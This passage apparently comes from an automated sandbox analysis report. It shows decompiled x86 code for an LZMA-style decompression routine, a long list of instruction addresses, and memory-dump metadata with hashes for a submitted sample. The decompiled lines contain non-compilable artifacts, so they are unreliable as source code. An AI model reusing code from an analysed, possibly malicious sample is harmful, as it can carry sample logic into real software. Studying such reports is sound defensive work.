							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                0x00000000
                0x00406520
                0x00406520
                0x00406524
                0x004065db
                0x004065de
                0x004065ea
                0x004064cb
                0x004064cb
                0x004064ce
                0x00406840
                0x00406840
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x0040688f
                0x004068b6
                0x004068b6
                0x004068bc
                0x004068bc
                0x00000000
                0x00406891
                0x00406891
                0x00406895
                0x00406a44
                0x00000000
                0x00406a44
                0x004068a1
                0x004068a8
                0x004068b0
                0x004068b3
                0x00000000
                0x004068b3
                0x0040652a
                0x0040652e
                0x00406a6f
                0x00406a6f
                0x00406a72
                0x00406a76
                0x00406a76
                0x00406534
                0x0040653a
                0x0040653d
                0x00406541
                0x00406544
                0x00406548
                0x00406a0e
                0x00406a5a
                0x00406a62
                0x00406a69
                0x00406a6b
                0x00000000
                0x00406a6b
                0x0040654e
                0x00406551
                0x00406557
                0x00406559
                0x00406559
                0x0040655c
                0x0040655f
                0x00406562
                0x00406565
                0x00406568
                0x0040656b
                0x0040656c
                0x0040656e
                0x0040656e
                0x0040656e
                0x00406571
                0x00406574
                0x00406577
                0x0040657a
                0x0040657a
                0x0040657d
                0x0040657f
                0x0040657f
                0x00406582
                0x00406582
                0x00406582
                0x00406058
                0x00406058
                0x00406061
                0x00000000
                0x00000000
                0x00406067
                0x00000000
                0x00406072
                0x00000000
                0x00000000
                0x0040607b
                0x0040607e
                0x00406081
                0x00406085
                0x00000000
                0x00000000
                0x0040608b
                0x0040608e
                0x00406090
                0x00406091
                0x00406094
                0x00406096
                0x00406097
                0x00406099
                0x0040609c
                0x004060a1
                0x004060a6
                0x004060af
                0x004060c2
                0x004060c5
                0x004060d1
                0x004060f9
                0x004060fb
                0x00406109
                0x00406109
                0x0040610d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004060fd
                0x004060fd
                0x00406100
                0x00406101
                0x00406101
                0x00000000
                0x004060fd
                0x004060d7
                0x004060dc
                0x004060dc
                0x004060e5
                0x004060ed
                0x004060f0
                0x00000000
                0x004060f6
                0x004060f6
                0x00000000
                0x004060f6
                0x00000000
                0x00406113
                0x00406113
                0x00406117
                0x004069c3
                0x00000000
                0x004069c3
                0x00406120
                0x00406130
                0x00406133
                0x00406136
                0x00406136
                0x00406136
                0x00406139
                0x0040613d
                0x00000000
                0x00000000
                0x0040613f
                0x00406145
                0x0040616f
                0x00406175
                0x0040617c
                0x00000000
                0x0040617c
                0x0040614b
                0x0040614e
                0x00406153
                0x00406153
                0x0040615e
                0x00406166
                0x00406169
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061ae
                0x004061b4
                0x004061b7
                0x004061c4
                0x004061cc
                0x00000000
                0x00000000
                0x00406183
                0x00406183
                0x00406187
                0x004069d2
                0x00000000
                0x004069d2
                0x00406193
                0x0040619e
                0x0040619e
                0x0040619e
                0x004061a1
                0x004061a4
                0x004061a7
                0x004061ac
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061d4
                0x004061d6
                0x004061d9
                0x0040624a
                0x0040624d
                0x00406250
                0x00406257
                0x00406261
                0x00000000
                0x00406261
                0x004061db
                0x004061df
                0x004061e2
                0x004061e4
                0x004061e7
                0x004061ea
                0x004061ec
                0x004061ef
                0x004061f1
                0x004061f6
                0x004061f9
                0x004061fc
                0x00406200
                0x00406207
                0x0040620a
                0x00406211
                0x00406215
                0x0040621d
                0x0040621d
                0x0040621d
                0x00406217
                0x00406217
                0x00406217
                0x0040620c
                0x0040620c
                0x0040620c
                0x00406221
                0x00406224
                0x00406242
                0x00406244
                0x00000000
                0x00406226
                0x00406226
                0x00406229
                0x0040622c
                0x0040622f
                0x00406231
                0x00406231
                0x00406231
                0x00406234
                0x00406237
                0x00406239
                0x0040623a
                0x0040623d
                0x00000000
                0x0040623d
                0x00000000
                0x00406473
                0x00406477
                0x00406495
                0x00406498
                0x0040649f
                0x004064a2
                0x004064a5
                0x004064a8
                0x004064ab
                0x004064ae
                0x004064b0
                0x004064b7
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064c0
                0x004064c3
                0x004064c3
                0x004064c8
                0x00000000
                0x004064c8
                0x00406479
                0x0040647c
                0x0040647f
                0x00406489
                0x00000000
                0x00000000
                0x004064dd
                0x004064e1
                0x00406504
                0x00406507
                0x0040650a
                0x00406514
                0x004064e3
                0x004064e3
                0x004064e6
                0x004064e9
                0x004064ec
                0x004064f9
                0x004064fc
                0x004064fc
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406591
                0x00406595
                0x0040659c
                0x0040659f
                0x004065a2
                0x004065ac
                0x00000000
                0x004065ac
                0x00406597
                0x00000000
                0x00000000
                0x004065b8
                0x004065bc
                0x004065c3
                0x004065c6
                0x004065c9
                0x004065be
                0x004065be
                0x004065be
                0x004065cc
                0x004065cf
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x00000000
                0x00000000
                0x00406678
                0x00406678
                0x0040667c
                0x00406a1a
                0x00000000
                0x00406a1a
                0x00406682
                0x00406685
                0x00406688
                0x0040668c
                0x0040668f
                0x00406695
                0x00406697
                0x00406697
                0x00406697
                0x0040669a
                0x0040669d
                0x00000000
                0x00000000
                0x0040626d
                0x0040626d
                0x00406271
                0x004069de
                0x00000000
                0x004069de
                0x00406277
                0x0040627a
                0x0040627d
                0x00406281
                0x00406284
                0x0040628a
                0x0040628c
                0x0040628c
                0x0040628c
                0x0040628f
                0x00406292
                0x00406292
                0x00406295
                0x00406298
                0x00000000
                0x00000000
                0x0040629e
                0x004062a4
                0x00000000
                0x00000000
                0x004062aa
                0x004062aa
                0x004062ae
                0x004062b1
                0x004062b4
                0x004062b7
                0x004062ba
                0x004062bb
                0x004062be
                0x004062c0
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062f4
                0x004062f7
                0x004062fa
                0x004062fd
                0x00406304
                0x00406308
                0x0040630a
                0x0040630e
                0x004062da
                0x004062da
                0x004062de
                0x004062e6
                0x004062eb
                0x004062ed
                0x004062ef
                0x004062ef
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x00406321
                0x00000000
                0x00406321
                0x00000000
                0x00406326
                0x00406326
                0x0040632a
                0x004069ea
                0x00000000
                0x004069ea
                0x00406330
                0x00406333
                0x00406336
                0x0040633a
                0x0040633d
                0x00406343
                0x00406345
                0x00406345
                0x00406345
                0x00406348
                0x0040634b
                0x0040634b
                0x0040634b
                0x00406351
                0x00000000
                0x00000000
                0x00406353
                0x00406356
                0x00406359
                0x0040635c
                0x0040635f
                0x00406362
                0x00406365
                0x00406368
                0x0040636b
                0x0040636e
                0x00406371
                0x00406389
                0x0040638c
                0x0040638f
                0x00406392
                0x00406392
                0x00406395
                0x00406399
                0x0040639b
                0x00406373
                0x00406373
                0x0040637b
                0x00406380
                0x00406382
                0x00406384
                0x00406384
                0x0040639e
                0x004063a5
                0x004063a8
                0x00000000
                0x004063aa
                0x00000000
                0x004063aa
                0x004063a8
                0x004063af
                0x004063af
                0x004063af
                0x004063af
                0x00000000
                0x00000000
                0x004063ea
                0x004063ea
                0x004063ee
                0x004069f6
                0x00000000
                0x004069f6
                0x004063f4
                0x004063f7
                0x004063fa
                0x004063fe
                0x00406401
                0x00406407
                0x00406409
                0x00406409
                0x00406409
                0x0040640c
                0x0040640f
                0x0040640f
                0x00406415
                0x004063b3
                0x004063b3
                0x004063b6
                0x00000000
                0x004063b6
                0x00406417
                0x00406417
                0x0040641a
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x0040642c
                0x0040642f
                0x00406432
                0x00406435
                0x0040644d
                0x00406450
                0x00406453
                0x00406456
                0x00406456
                0x00406459
                0x0040645d
                0x0040645f
                0x00406437
                0x00406437
                0x0040643f
                0x00406444
                0x00406446
                0x00406448
                0x00406448
                0x00406462
                0x00406469
                0x0040646c
                0x00000000
                0x0040646e
                0x00000000
                0x0040646e
                0x00000000
                0x004066fb
                0x004066fb
                0x004066ff
                0x00406a26
                0x00000000
                0x00406a26
                0x00406705
                0x00406708
                0x0040670b
                0x0040670f
                0x00406712
                0x00406718
                0x0040671a
                0x0040671a
                0x0040671a
                0x0040671d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040680a
                0x0040680e
                0x00406830
                0x00406833
                0x0040683d
                0x00000000
                0x0040683d
                0x00406810
                0x00406813
                0x00406817
                0x0040681a
                0x0040681a
                0x0040681d
                0x00000000
                0x00000000
                0x004068c7
                0x004068cb
                0x004068e9
                0x004068e9
                0x004068e9
                0x004068f0
                0x004068f7
                0x004068fe
                0x004068fe
                0x00000000
                0x004068fe
                0x004068cd
                0x004068d0
                0x004068d3
                0x004068d6
                0x004068dd
                0x00406821
                0x00406821
                0x00406824
                0x00000000
                0x00000000
                0x004069b8
                0x004069bb
                0x00000000
                0x00000000
                0x004065f2
                0x004065f4
                0x004065fb
                0x004065fc
                0x004065fe
                0x00406601
                0x00000000
                0x00000000
                0x00406609
                0x0040660c
                0x0040660f
                0x00406611
                0x00406613
                0x00406613
                0x00406614
                0x00406617
                0x0040661e
                0x00406621
                0x0040662f
                0x00000000
                0x00000000
                0x00406905
                0x00406905
                0x00406908
                0x0040690f
                0x00000000
                0x00000000
                0x00406914
                0x00406914
                0x00406918
                0x00406a50
                0x00000000
                0x00406a50
                0x0040691e
                0x00406921
                0x00406924
                0x00406928
                0x0040692b
                0x00406931
                0x00406933
                0x00406933
                0x00406933
                0x00406936
                0x00406939
                0x00406939
                0x00406939
                0x00406939
                0x0040693c
                0x0040693c
                0x00406940
                0x004069a0
                0x004069a3
                0x004069a8
                0x004069a9
                0x004069ab
                0x004069ad
                0x004069b0
                0x00000000
                0x004069b0
                0x00406942
                0x00406948
                0x0040694b
                0x0040694e
                0x00406951
                0x00406954
                0x00406957
                0x0040695a
                0x0040695d
                0x00406960
                0x00406963
                0x0040697c
                0x0040697f
                0x00406982
                0x00406985
                0x00406989
                0x0040698b
                0x0040698b
                0x0040698c
                0x0040698f
                0x00406965
                0x00406965
                0x0040696d
                0x00406972
                0x00406974
                0x00406977
                0x00406977
                0x00406992
                0x00406999
                0x00000000
                0x0040699b
                0x00000000
                0x0040699b
                0x00000000
                0x00406637
                0x0040663a
                0x00406670
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a3
                0x004067a3
                0x004067a6
                0x004067a8
                0x00406a32
                0x00000000
                0x00406a32
                0x004067ae
                0x004067b1
                0x00000000
                0x00000000
                0x004067b7
                0x004067bb
                0x004067be
                0x004067be
                0x004067be
                0x00000000
                0x004067be
                0x0040663c
                0x0040663e
                0x00406640
                0x00406642
                0x00406645
                0x00406646
                0x00406648
                0x0040664a
                0x0040664d
                0x00406650
                0x00406666
                0x0040666b
                0x004066a3
                0x004066a3
                0x004066a7
                0x004066d3
                0x004066d5
                0x004066dc
                0x004066df
                0x004066e2
                0x004066e2
                0x004066e7
                0x004066e7
                0x004066e9
                0x004066ec
                0x004066f3
                0x004066f6
                0x00406723
                0x00406723
                0x00406726
                0x00406729
                0x0040679d
                0x0040679d
                0x0040679d
                0x00000000
                0x0040679d
                0x0040672b
                0x00406731
                0x00406734
                0x00406737
                0x0040673a
                0x0040673d
                0x00406740
                0x00406743
                0x00406746
                0x00406749
                0x0040674c
                0x00406765
                0x00406767
                0x0040676a
                0x0040676b
                0x0040676e
                0x00406770
                0x00406773
                0x00406775
                0x00406777
                0x0040677a
                0x0040677c
                0x0040677f
                0x00406783
                0x00406785
                0x00406785
                0x00406786
                0x00406789
                0x0040678c
                0x0040674e
                0x0040674e
                0x00406756
                0x0040675b
                0x0040675d
                0x00406760
                0x00406760
                0x0040678f
                0x00406796
                0x00406720
                0x00406720
                0x00406720
                0x00406720
                0x00000000
                0x00406798
                0x00000000
                0x00406798
                0x00406796
                0x004066a9
                0x004066ac
                0x004066ae
                0x004066b1
                0x004066b4
                0x004066b7
                0x004066b9
                0x004066bc
                0x004066bf
                0x004066bf
                0x004066c2
                0x004066c2
                0x004066c5
                0x004066cc
                0x004066a0
                0x004066a0
                0x004066a0
                0x004066a0
                0x00000000
                0x004066ce
                0x00000000
                0x004066ce
                0x004066cc
                0x00406652
                0x00406655
                0x00406657
                0x0040665a
                0x00000000
                0x00000000
                0x004063b9
                0x004063b9
                0x004063bd
                0x00406a02
                0x00000000
                0x00406a02
                0x004063c3
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d2
                0x004063d5
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e2
                0x004063e2
                0x004063e2
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004067c1
                0x004067c1
                0x004067c1
                0x004067c5
                0x00000000
                0x00000000
                0x004067cb
                0x004067ce
                0x004067d1
                0x004067d4
                0x004067d6
                0x004067d6
                0x004067d6
                0x004067d9
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e9
                0x004067eb
                0x004067eb
                0x004067eb
                0x004067ee
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fe
                0x00406800
                0x00406803
                0x00000000
                0x00406805
                0x00000000
                0x00406805
                0x00406803
                0x00406a38
                0x00000000
                0x00000000
                0x00406067

                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406025, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00406025(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406A77))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
